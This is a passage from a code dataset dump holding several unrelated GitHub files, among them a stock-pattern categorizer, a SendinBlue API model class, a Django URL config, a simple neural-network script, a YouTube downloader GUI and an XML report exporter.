\\\n\t'GGAAGGAGTCAGGTGGCAGCGTGGAGGCCCCCAGGATGGGGTTCACCCACCCGCCGGGCCACC', \\\n\t'TCTCTGGGTGCCAGAGCAGCCTGGCCAGTGGTGAGACGGGGACAGGCTCTGCTGACCCGCCAG', \\\n\t'GGGGACCCCGCCCCGGGCTGACCCGAAGGGCCCCGGTAAAAGACACACCTGGACGAGCCCCCG', \\\n\t'CTGCTGACGCAGCTCCAGCAGGCCCCTCCAGCTGCCTGGGCTGAGGTGTCTGGTGCCTGGAAC', \\\n\t'AGACTTCCCTGTGGAGGATTCCTGCCAGACCCTGCCCGGCTCCTCCCTGACCGGTCCTTGTGC', \\\n\t'CCTCACCAGACACCCTGTTGGCCATGACTCAACAAACCAGTGTTGGGAGCCGTCTGCCTCCCC', \\\n\t'AGCTCAGTGCCTTTCTGCACCCCTTCTCTCCTGGGGAGCTGTCTGCATCCGCCACCCCCTCC'])\n\t#--------------------------------------------------------\n\tdef test_fastaMirMap(self):\n\t\tself.assertEqual(runTest_fastaMirMap(),trueSeq)\n\tdef test_fastaRNAhybridPITAmiRanda(self):\n\t\tself.assertEqual(runTest_fastaRNAhybridPITAmiRanda(),trueSeq)\n\tdef test_targetMiner(self):\n\t\tself.assertEqual(runTest_targetMiner(),trueSeq)\n\tdef test_targetScan(self):\n\t\tself.assertEqual(runTest_targetScan(),trueSeq)\n\tdef test_SVMicro(self):\n\t\tself.assertEqual(runTest_SVMicro(),trueSeq)\n\t\n\t\t\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"oscarcbr/cellery","sub_path":"tests/test_alignments.py","file_name":"test_alignments.py","file_ext":"py","file_size_in_byte":12105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26980222639","text":"import pandas as pd\nfrom sertl_analytics.constants.pattern_constants import CN, SVC\nfrom sertl_analytics.mydates import MyDate\nfrom pattern_system_configuration import SystemConfiguration\nimport numpy as np\nimport math\n\n\nclass ValueCategorizer:\n def __init__(self, sys_config: SystemConfiguration, df: pd.DataFrame, f_upper, f_lower, h_upper, h_lower):\n # ToDo: To eliminate spikes we could take the extrema of the corpus of a candle - not the shadows\n self.sys_config = sys_config\n self._index_column = CN.TIMESTAMP\n self.df = df\n self.df_length = self.df.shape[0]\n self._f_upper = f_upper\n self._f_lower = f_lower\n self._h_upper = h_upper\n self._h_lower = h_lower\n self._tolerance_pct = self.sys_config.get_value_categorizer_tolerance_pct()\n self._tolerance_pct_equal = self.sys_config.get_value_categorizer_tolerance_pct_equal()\n self._tolerance_pct_buying = self.sys_config.get_value_categorizer_tolerance_pct_buying()\n self.value_category_dic_key_list = []\n self.value_category_dic = {} # list of value categories by _index_column of each extrema entry\n self.value_category_dic_for_pos = {} # list of value categories by position of each extrema entry\n self.value_pos_list = []\n # self.value_pos_list = []\n self.__set_f_upper_f_lower_values__()\n self.__set_h_upper_h_lower_values__()\n self.__calculate_value_categories__()\n\n def get_number_upper_touches(self, ts_start=0, ts_end=math.inf) -> int:\n return self.count_value_category(SVC.U_on, ts_start, ts_end)\n\n def get_number_lower_touches(self, ts_start=0, ts_end=math.inf) -> int:\n return self.count_value_category(SVC.L_on, ts_start, ts_end)\n\n def are_all_values_above_f_lower(self, with_tolerance: bool = False) -> bool: # TODO with_tolerance\n tolerance = self.df[CN.LOW].mean() * self._tolerance_pct\n df_local = self.df[self.df[CN.LOW] < self.df[CN.F_LOWER] - tolerance]\n return df_local.shape[0] == 0\n\n def are_all_values_in_value_category(self, value_category: str) -> bool:\n return self.df_length == self.count_value_category(value_category)\n\n def are_all_values_in_value_category_list(self, value_categories: list) -> bool:\n for key in self.value_category_dic:\n if not set(self.value_category_dic[key]).issubset(set(value_categories)):\n return False\n return True\n\n def is_value_in_category(self, value: float, time_stamp: int, value_category: str, print_range=False):\n data_series = self.__get_data_series_for_value__(time_stamp, value)\n value_categories = self.__get_value_categories_for_df_row__(data_series)\n is_in_category = value_category in value_categories\n if is_in_category and print_range:\n self.__print_value_range_for_category__(data_series, value_category)\n return is_in_category\n\n def __get_data_series_for_value__(self, time_stamp, value=0.0):\n data_dict = {CN.F_UPPER: self._f_upper(time_stamp),\n CN.H_UPPER: self._h_upper(time_stamp),\n CN.F_LOWER: self._f_lower(time_stamp),\n CN.H_LOWER: self._h_lower(time_stamp),\n CN.HIGH: value, CN.LOW: value, CN.OPEN: value, CN.CLOSE: value}\n return pd.Series(data_dict)\n\n def are_helper_functions_available(self):\n if self._h_lower is None or self._h_upper is None:\n return False\n return self._h_upper != self._f_upper or self._h_lower != self._f_lower\n\n def __set_f_upper_f_lower_values__(self):\n self.df = self.df.assign(F_UPPER=(self._f_upper(self.df[self._index_column])))\n self.df = self.df.assign(F_LOWER=(self._f_lower(self.df[self._index_column])))\n\n def __set_h_upper_h_lower_values__(self):\n if self.are_helper_functions_available():\n self.df = self.df.assign(H_UPPER=(self._h_upper(self.df[self._index_column])))\n self.df = self.df.assign(H_LOWER=(self._h_lower(self.df[self._index_column])))\n\n def count_value_category(self, category: str, ts_start=0, ts_end=math.inf) -> int:\n filtered_list = [self.value_category_dic[key] for key in self.value_category_dic_key_list\n if ts_start <= key <= ts_end]\n hit_list_counter = sum([1 for category_list in filtered_list if category in category_list])\n self.__print_count_value_category_details__(ts_start, hit_list_counter, category)\n return hit_list_counter\n\n @staticmethod\n def __print_count_value_category_details__(ts_start: int, hit_list_counter: int, category: str):\n if ts_start == 0 or hit_list_counter == 0: # we print only available numbers\n return\n ts_start_time = MyDate.get_date_time_from_epoch_seconds(ts_start)\n # print('pattern.count_value_category for {}: hit_list_counter={}: after: {}'.format(\n # category, hit_list_counter, ts_start_time))\n\n def __calculate_value_categories__(self):\n for ind, row in self.df.iterrows():\n self.value_category_dic_key_list.append(row[self._index_column])\n self.value_pos_list.append(row[CN.POSITION])\n if row[CN.F_UPPER] >= row[CN.F_LOWER]:\n self.value_category_dic[row[self._index_column]] = self.__get_value_categories_for_df_row__(row)\n self.value_category_dic_for_pos[row[CN.POSITION]] = self.value_category_dic[row[self._index_column]]\n # print('{}: _f_upper={:.4f} / high={}, low={} / _f_lower={:.4f}: {}'.format(\n # ind, row[CN.F_UPPER], row[CN.HIGH], row[CN.LOW], row[CN.F_LOWER],\n # self.value_category_dic_for_pos[row[CN.POSITION]]))\n else:\n self.value_category_dic[row[self._index_column]] = []\n self.value_category_dic_for_pos[row[CN.POSITION]] = []\n\n def __print_value_range_for_category__(self, data_series, value_category: str):\n l_value, u_value = self.__get_value_range_for_category__(data_series, value_category)\n print('Value range for category {}: [{:.2f}, {:.2f}]'.format(value_category, l_value, u_value))\n\n def get_value_range_for_category(self, time_stamp: float, value_category: str):\n data_series = self.__get_data_series_for_value__(time_stamp)\n return self.__get_value_range_for_category__(data_series, value_category)\n\n def __get_value_range_for_category__(self, row, value_category: str):\n lower_pct, upper_pct = 1 - self._tolerance_pct, 1 + self._tolerance_pct\n lower_pct_buying, upper_pct_buying = 1 - self._tolerance_pct_buying, 1 + self._tolerance_pct_buying\n if value_category == SVC.U_out:\n return row[CN.F_UPPER] * upper_pct, math.inf\n elif value_category == SVC.U_on:\n return row[CN.F_UPPER] * lower_pct, row[CN.F_UPPER] * upper_pct\n elif value_category == SVC.M_in:\n return row[CN.F_LOWER] * upper_pct, row[CN.F_UPPER] * lower_pct\n elif value_category == SVC.L_in:\n return row[CN.F_LOWER] * lower_pct, row[CN.F_LOWER] * upper_pct\n elif value_category == SVC.L_on:\n return row[CN.F_LOWER] * lower_pct, row[CN.F_LOWER] * upper_pct\n elif value_category == SVC.L_out:\n return -math.inf, row[CN.F_LOWER] * lower_pct\n elif value_category == SVC.H_U_out:\n return row[CN.H_UPPER] * upper_pct, math.inf\n elif value_category == SVC.H_M_in:\n return row[CN.H_LOWER] * upper_pct, row[CN.H_UPPER] * lower_pct\n elif value_category == SVC.H_L_out:\n return -math.inf, row[CN.H_LOWER] * lower_pct\n elif value_category == SVC.B_U_out:\n return row[CN.F_UPPER] * upper_pct_buying, math.inf\n elif value_category == SVC.B_L_out:\n return -math.inf, row[CN.F_LOWER] * lower_pct_buying\n else:\n return 0, 0\n\n def __get_value_categories_for_df_row__(self, row) -> list: # the series is important\n return_list = []\n # ToDo: M_in shouldn't be with U_on or L_on.... but to get this we have to redesign thr pattern ranges....\n if self.__is_row_value_equal_f_upper__(row):\n return_list.append(SVC.U_on)\n if self.__is_row_value_in_f_upper_range__(row):\n return_list.append(SVC.U_in)\n if self.__is_row_value_larger_f_upper__(row):\n return_list.append(SVC.U_out)\n if self.__is_row_value_equal_f_lower__(row):\n return_list.append(SVC.L_on)\n if self.__is_row_value_in_f_lower_range__(row):\n return_list.append(SVC.L_in)\n if not self.__is_any_high_or_low_in_list__(return_list) and self.__is_row_value_between_f_lower_f_upper__(row):\n return_list.append(SVC.M_in)\n if self.__is_row_value_smaller_f_lower__(row):\n return_list.append(SVC.L_out)\n\n if self.are_helper_functions_available():\n self.__get_helper_values_categories_for_df_row__(return_list, row)\n return return_list\n\n def __get_helper_values_categories_for_df_row__(self, return_list, row):\n if self.__is_row_value_larger_h_upper__(row):\n return_list.append(SVC.H_U_out)\n if self.__is_row_value_between_h_lower_h_upper__(row):\n return_list.append(SVC.H_M_in)\n if self.__is_row_value_smaller_h_lower__(row):\n return_list.append(SVC.H_L_out)\n\n def __is_row_value_in_f_upper_range__(self, row):\n return abs(row[CN.HIGH] - row[CN.F_UPPER])/ row[CN.F_UPPER] <= self._tolerance_pct\n\n def __is_row_value_in_h_upper_range__(self, row):\n return abs(row[CN.HIGH] - row[CN.H_UPPER])/ row[CN.H_UPPER] <= self._tolerance_pct\n\n def __is_row_value_in_f_lower_range__(self, row):\n return abs(row[CN.LOW] - row[CN.F_LOWER]) / row[CN.F_LOWER] <= self._tolerance_pct\n\n def __is_row_value_in_h_lower_range__(self, row):\n return abs(row[CN.LOW] - row[CN.H_LOWER]) / row[CN.H_LOWER] <= self._tolerance_pct\n\n @staticmethod\n def __is_row_value_between_f_lower_f_upper__(row):\n return row[CN.F_LOWER] < row[CN.LOW] <= row[CN.HIGH] < row[CN.F_UPPER]\n\n @staticmethod\n def __is_row_value_between_h_lower_h_upper__(row):\n return row[CN.H_LOWER] < row[CN.LOW] <= row[CN.HIGH] < row[CN.H_UPPER]\n\n def __is_row_value_larger_h_upper__(self, row):\n return row[CN.HIGH] > row[CN.H_UPPER] and not self.__is_row_value_in_h_upper_range__(row)\n\n def __is_row_value_equal_f_upper__(self, row):\n value_pct = abs(row[CN.HIGH] - row[CN.F_UPPER]) / row[CN.F_UPPER]\n return value_pct <= self._tolerance_pct_equal\n\n def __is_row_value_larger_f_upper__(self, row):\n return row[CN.HIGH] > row[CN.F_UPPER] and not self.__is_row_value_in_f_upper_range__(row)\n\n @staticmethod\n def __is_row_value_smaller_f_upper__(row):\n return row[CN.HIGH] < row[CN.F_UPPER]\n\n def __is_row_value_equal_f_lower__(self, row):\n value_pct = abs(row[CN.LOW] - row[CN.F_LOWER]) / row[CN.F_LOWER]\n return value_pct <= self._tolerance_pct_equal\n\n @staticmethod\n def __is_row_value_larger_f_lower__(row):\n return row[CN.LOW] > row[CN.F_LOWER]\n\n @staticmethod\n def __is_any_high_or_low_in_list__(check_list: list):\n high_low_set = {SVC.U_in, SVC.U_on, SVC.L_in, SVC.L_on}\n intersections = high_low_set.intersection(set(check_list))\n return len(intersections) > 0\n\n def __is_row_value_smaller_f_lower__(self, row):\n return row[CN.LOW] < row[CN.F_LOWER] and not self.__is_row_value_in_f_lower_range__(row)\n\n def __is_row_value_smaller_h_lower__(self, row):\n return row[CN.LOW] < row[CN.H_LOWER] and not self.__is_row_value_in_h_lower_range__(row)\n\n\nclass ValueCategorizerHeadShoulder(ValueCategorizer): # currently we don't need a separate for ...Bottom\n def __init__(self, sys_config: SystemConfiguration, pattern_range, df: pd.DataFrame,\n f_upper, f_lower, h_upper, h_lower):\n self._pattern_range = pattern_range\n self._shoulder_timestamps = [self._pattern_range.hsf.tick_shoulder_left.time_stamp,\n self._pattern_range.hsf.tick_shoulder_right.time_stamp]\n ValueCategorizer.__init__(self, sys_config, df, f_upper, f_lower, h_upper, h_lower)\n\n def __get_helper_values_categories_for_df_row__(self, return_list, row):\n if row[CN.TIMESTAMP] in self._shoulder_timestamps:\n if self.__is_row_value_equal_h__(row):\n return_list.append(SVC.H_on)\n if self.__is_row_value_in_h_range__(row):\n return_list.append(SVC.H_in)\n\n def __is_row_value_equal_h__(self, row): # used for HEAD_SHOULDER - both helper are identical\n return self.__are_distance_values_in_tolerance_range__(row, self._tolerance_pct_equal)\n\n def __is_row_value_in_h_range__(self, row): # used for HEAD_SHOULDER - both helper are identical\n return self.__are_distance_values_in_tolerance_range__(row, self._tolerance_pct * 2.5)\n\n def __are_distance_values_in_tolerance_range__(self, row, tolerance_pct):\n distance_to_low, distance_to_high = self.__get_distance_values__(row)\n return distance_to_low <= tolerance_pct or distance_to_high <= tolerance_pct\n\n @staticmethod\n def __get_distance_values__(row):\n distance_to_low = round(abs(row[CN.LOW] - row[CN.H_LOWER]) / np.mean([row[CN.LOW], row[CN.H_LOWER]]), 4)\n distance_to_high = round(abs(row[CN.HIGH] - row[CN.H_LOWER]) / np.mean([row[CN.HIGH], row[CN.H_LOWER]]), 4)\n return distance_to_low, distance_to_high\n\n\n","repo_name":"SertlAnalytics/PycharmProjects","sub_path":"Gaming/Stocks/pattern_value_categorizer.py","file_name":"pattern_value_categorizer.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"39708659661","text":"# coding: utf-8\n\n\"\"\"\n SendinBlue API\n\n SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501\n\n OpenAPI spec version: 3.0.0\n Contact: contact@sendinblue.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass SendSmtpEmailMessageVersions(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'to': 'list[SendSmtpEmailTo1]',\n 'params': 'dict(str, object)',\n 'bcc': 'list[SendSmtpEmailBcc]',\n 'cc': 'list[SendSmtpEmailCc]',\n 'reply_to': 'SendSmtpEmailReplyTo1',\n 'subject': 'str'\n }\n\n attribute_map = {\n 'to': 'to',\n 'params': 'params',\n 'bcc': 'bcc',\n 'cc': 'cc',\n 'reply_to': 'replyTo',\n 'subject': 'subject'\n }\n\n def __init__(self, to=None, params=None, bcc=None, cc=None, reply_to=None, subject=None): # noqa: E501\n \"\"\"SendSmtpEmailMessageVersions - a model defined in Swagger\"\"\" # noqa: E501\n\n self._to = None\n self._params = None\n self._bcc = None\n self._cc = None\n self._reply_to = None\n self._subject = None\n self.discriminator = None\n\n self.to = to\n if params is not None:\n self.params = params\n if bcc is not None:\n self.bcc = bcc\n if cc is not None:\n self.cc = cc\n if reply_to is not None:\n self.reply_to = reply_to\n if subject is not None:\n self.subject = subject\n\n @property\n def to(self):\n \"\"\"Gets the to of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (_optional_) of the recipients. For example, [{\\\"name\\\":\\\"Jimmy\\\", \\\"email\\\":\\\"jimmy98@example.com\\\"}, {\\\"name\\\":\\\"Joe\\\", \\\"email\\\":\\\"joe@example.com\\\"}] # noqa: E501\n\n :return: The to of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailTo1]\n \"\"\"\n return self._to\n\n @to.setter\n def to(self, to):\n \"\"\"Sets the to of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (_optional_) of the recipients. For example, [{\\\"name\\\":\\\"Jimmy\\\", \\\"email\\\":\\\"jimmy98@example.com\\\"}, {\\\"name\\\":\\\"Joe\\\", \\\"email\\\":\\\"joe@example.com\\\"}] # noqa: E501\n\n :param to: The to of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailTo1]\n \"\"\"\n if to is None:\n raise ValueError(\"Invalid value for `to`, must not be `None`\") # noqa: E501\n\n self._to = to\n\n @property\n def params(self):\n \"\"\"Gets the params of this SendSmtpEmailMessageVersions. # noqa: E501\n\n Pass the set of attributes to customize the template. For example, {\\\"FNAME\\\":\\\"Joe\\\", \\\"LNAME\\\":\\\"Doe\\\"}. It's considered only if template is in New Template Language format. # noqa: E501\n\n :return: The params of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: dict(str, object)\n \"\"\"\n return self._params\n\n @params.setter\n def params(self, params):\n \"\"\"Sets the params of this SendSmtpEmailMessageVersions.\n\n Pass the set of attributes to customize the template. For example, {\\\"FNAME\\\":\\\"Joe\\\", \\\"LNAME\\\":\\\"Doe\\\"}. It's considered only if template is in New Template Language format. # noqa: E501\n\n :param params: The params of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: dict(str, object)\n \"\"\"\n\n self._params = params\n\n @property\n def bcc(self):\n \"\"\"Gets the bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (optional) of the recipients in bcc # noqa: E501\n\n :return: The bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailBcc]\n \"\"\"\n return self._bcc\n\n @bcc.setter\n def bcc(self, bcc):\n \"\"\"Sets the bcc of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (optional) of the recipients in bcc # noqa: E501\n\n :param bcc: The bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailBcc]\n \"\"\"\n\n self._bcc = bcc\n\n @property\n def cc(self):\n \"\"\"Gets the cc of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (optional) of the recipients in cc # noqa: E501\n\n :return: The cc of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailCc]\n \"\"\"\n return self._cc\n\n @cc.setter\n def cc(self, cc):\n \"\"\"Sets the cc of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (optional) of the recipients in cc # noqa: E501\n\n :param cc: The cc of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailCc]\n \"\"\"\n\n self._cc = cc\n\n @property\n def reply_to(self):\n \"\"\"Gets the reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n\n\n :return: The reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: SendSmtpEmailReplyTo1\n \"\"\"\n return self._reply_to\n\n @reply_to.setter\n def reply_to(self, reply_to):\n \"\"\"Sets the reply_to of this SendSmtpEmailMessageVersions.\n\n\n :param reply_to: The reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: SendSmtpEmailReplyTo1\n \"\"\"\n\n self._reply_to = reply_to\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this SendSmtpEmailMessageVersions. # noqa: E501\n\n Custom subject specific to message version # noqa: E501\n\n :return: The subject of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this SendSmtpEmailMessageVersions.\n\n Custom subject specific to message version # noqa: E501\n\n :param subject: The subject of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: str\n \"\"\"\n\n self._subject = subject\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(SendSmtpEmailMessageVersions, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, SendSmtpEmailMessageVersions):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"DT7Solutions/SumaFilmyArts","sub_path":"env-suma/Lib/site-packages/sib_api_v3_sdk/models/send_smtp_email_message_versions.py","file_name":"send_smtp_email_message_versions.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29198918495","text":"from django.urls import path\n\nfrom intro import views\n\nurlpatterns = [\n path('intro/', views.show_name, name='hello'),\n path('all-students/', views.students, name='all_students'),\n path('all-movies/', views.all_awesome_movies, name='all_movies')\n]\n\n","repo_name":"Ucosmin194/DjangoProject","sub_path":"intro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42854800335","text":"import numpy as np\nimport math\nfrom data_creation import create_data\nimport matplotlib.pyplot as plt\n\n# a very simple layer object - it may grow with time.\nclass Layer_Dense:\n\n def __init__(self, n_inputs, n_neurons):\n self.weights = 0.10 * np.random.randn(n_inputs, n_neurons)\n self.biases = np.zeros((1, n_neurons)) # 1, n_neurons since bias is per neuron not per weight\n\n def forward(self, input):\n self.output = np.dot(input, self.weights) + self.biases\n\n\n'''\nReLU as can be seen in the print of the result leads to values being dropped \nand potentially lost when trying to calc the error.\n'''\nclass Activation_ReLU:\n def forward(self, inputs):\n self.output = np.maximum(0, inputs)\n\n\n'''\nInstead of ReLU try out Softmax which is a non-linear rather than linear such as ReLU\n\nFirst as tried out in exponentation_sketchpad.py use exponentiation and normalization\nto implement a Softmax activation function:\nsoftmax steps:\nInput -> Exponentiate -> Normalize -> Output\n\n'''\n\n\nclass Activation_Softmax:\n def forward(self, inputs, axis=1):\n '''\n :param inputs:\n :param axis:\n :return:\n # wexp = np.subtract(inputs, max(inputs))\n exp_values = np.exp(np.subtract(inputs, max(inputs)))\n self.output = exp_values / np.sum(exp_values, axis=axis, keepdims=True)\n '''\n exp_values = np.exp(inputs - np.max(inputs, axis=axis, keepdims=True))\n self.output = exp_values / np.sum(exp_values, axis=axis, keepdims=True)\n\n\n\n'''\nNow after all the testing concepts and trying out the different moving parts we\nshould be ready to try to assemble them into a simple, but working, neural network. \nwe use the created spiral data from cs231 : \nhttps://cs231n.github.io/neural-networks-case-study/\n'''\nX, y = create_data(samples=100, classes=3)\n\n'''\nlooking at the created data, we should see a non-linear distribution of sample points.\nfrom MatplotlibLibrary import ConfigurableScatter\n\nprint(\"X: %s\" % X)\nConfigurableScatter(X[:, 0], X[:, 1]).withLabels(y, \"Created Test data\", \"X\", \"Y\")\n'''\n\n\n\n\ninputLayer = Layer_Dense(2, 5)\nactivation_relu = Activation_ReLU()\ninputLayer.forward(X)\nactivation_relu.forward(inputLayer.output)\n\nhiddenLayer1 = Layer_Dense(5, 5)\nactivation_softmax = Activation_Softmax()\n\nhiddenLayer1.forward(inputLayer.output)\n#print(\"MiddleLayer::output: %s\" % hiddenLayer1.output)\nactivation_softmax.forward(hiddenLayer1.output)\n\nprint(\"hiddenLayer1::output: %s\" % hiddenLayer1.output)\nprint(\"hiddenLayer1 activation_softmax::output: %s\" % activation_softmax.output)\n\n\n\n\n\n\n\n\n\n","repo_name":"amirrocker/ML-Training-Playground","sub_path":"NNFromScratch/scratchpad/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8353973872","text":"import PySimpleGUI as sg\r\nfrom pytube import YouTube\r\n\r\n# wygląd okienka heh\r\n\r\nsg.theme(\"DarkRed1\")\r\nlayout = [[sg.Text(\"Wstaw link z youtube\")],\r\n [sg.InputText()],\r\n [sg.Submit(), sg.Cancel()]]\r\n\r\nwindow = sg.Window(\"Pobieranie filmiku z youtube\", layout)\r\n\r\nevent, values = window.read()\r\nwindow.close()\r\n\r\n# Okienko 2\r\n\r\nlayout = [[sg.Text(\"Wstaw lokalizację pliku\")],\r\n [sg.InputText()],\r\n [sg.Submit(), sg.Cancel()]]\r\n\r\nwindow1 = sg.Window(\"Pobieranie filmiku z youtube\", layout)\r\n\r\newent, walues = window1.read()\r\nwindow.close()\r\n\r\n# pop up końcowy i dodatkowe przekształcenia\r\n\r\nlokalizacja = walues[0]\r\ntext_input = values[0]\r\nsg.popup(\"Pobieranie, program zrobiony przez BrzózkaTV\")\r\nlokalizacja.encode(\"unicode_escape\")\r\n\r\n# skrypt pobierania\r\n\r\nyt = YouTube(text_input)\r\nmoje_video = yt.streams.first()\r\nmoje_video.download(lokalizacja)\r\n\r\n# program zrobiony przez: (made by:) bartzszkoly@gmail.com (BrzózkaTV#5405)\r\n# smutny taki, mało kolorowy ten program coś :-)","repo_name":"PrzemyslawkaKokos/Pobieracz-Youtube-Video","sub_path":"PobieraczYoutubeVideo.py","file_name":"PobieraczYoutubeVideo.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33132801266","text":"import xml.etree.cElementTree as ElementTree\nfrom xml.dom import minidom\nimport logging\n\nfrom ..report.report_base import BaseReport\n\n\nclass XmlReport(BaseReport):\n\n @staticmethod\n def export_report(file_name: str, clear_after: bool=True):\n logging.info('exporting xml report to `{}`'.format(file_name))\n root = ElementTree.Element(\"report\", student_id='95411018')\n\n for section, errors in XmlReport.reports.items():\n section_element = ElementTree.SubElement(root, 'section', title=section)\n\n category_mapper = {}\n for err in errors:\n if err.category not in category_mapper:\n category_mapper[err.category] = ElementTree.SubElement(section_element, err.category)\n\n error_root = ElementTree.SubElement(\n category_mapper[err.category],\n 'error',\n category=err.category,\n subcategory=err.sub_category)\n\n ElementTree.SubElement(error_root, 'source').text = err.source\n ElementTree.SubElement(error_root, 'message').text = err.message\n\n logging.debug('pretty xml log...')\n xml_string = minidom.parseString(ElementTree.tostring(root)).toprettyxml(indent=\" \")\n with open(file_name, 'w') as f:\n logging.debug('writing to file...')\n f.write(xml_string)\n\n if clear_after:\n XmlReport.clear_report()\n\n logging.info('xml report generated successfully')\n","repo_name":"ehsundar/project_validator","sub_path":"project_validator/report/report_xml.py","file_name":"report_xml.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24645369824","text":"\"\"\"\nparse_stdout.py\nauthor: Some Human\ncreated: 4/8/2021\nParses stdout for experimental run of DAS, and formats output in a way easily uploadable to relevant trackers\n\"\"\"\n\n# TODO add columns\n# timestamp?\n# specific config/release?\n# TODO run analysis (relative_l1_error.py) on stdout\n# TODO change generic filename from stdout-i.stdout to filename.stdout to decouple from list order\n# TODO incorporate rules for formatting into IdentifyingStrings?\n\n\nimport os\nimport sys\nimport csv\n\n# begin tragesty. need to mess with paths and envs to allow access to das_framework :-/\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nDAS_FRAMEWORK_DIR = os.path.join(os.path.dirname(THIS_DIR), \"das_framework\")\nassert os.path.exists(DAS_FRAMEWORK_DIR), f\"cannot find {DAS_FRAMEWORK_DIR}\"\nsys.path.append(DAS_FRAMEWORK_DIR)\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n# end tragesty\n\nimport das_framework.ctools.s3 as s3\nimport subprocess\n\n# get das root env\nDAS_S3ROOT = os.getenv(\"DAS_S3ROOT\")\n\n\nclass IdentifyingStrings:\n \"\"\"\n Container for sets of identifying strings in the stdouts\n \"\"\"\n\n def __init__(self):\n # identifying strings where we're collecting all lines between the start line and the stop line\n self.multiline = {\n \"eps_single\": {\n \"start\": \"INFO: For single attr/dim\",\n \"stop\": \"For geolevel semantics protecting\"\n },\n \"eps_gl\": {\n \"start\": \"For geolevel semantics protecting\",\n \"stop\": \"-DP)\"\n },\n \"gp\": {\n \"start\": \"Place cenrace_7lev_two_comb * hispanic geounit proportion with L1 relative error less than 0.05, binned by CEF total population\",\n \"stop\": \"OSE geounit counts in each total population bin\"\n },\n \"vacant\": {\n \"start\": \"Place vacant_count geounit proportion with L1 relative error less than 0.05, binned by CEF total population\",\n \"stop\": \"OSE geounit counts in each total population bin\"\n },\n }\n\n # identifying strings where we're looking for a set number of lines below the ID string. n inclusive of start\n self.n_lines_directly_below = {\n \"output_files\": {\n \"start\": \"DAS OUTPUT FILES\",\n \"n\": 3\n }\n }\n\n # identifying strings where we're looking for only one value on a single line somwhere below the identifying string\n self.single_line_below = {\n 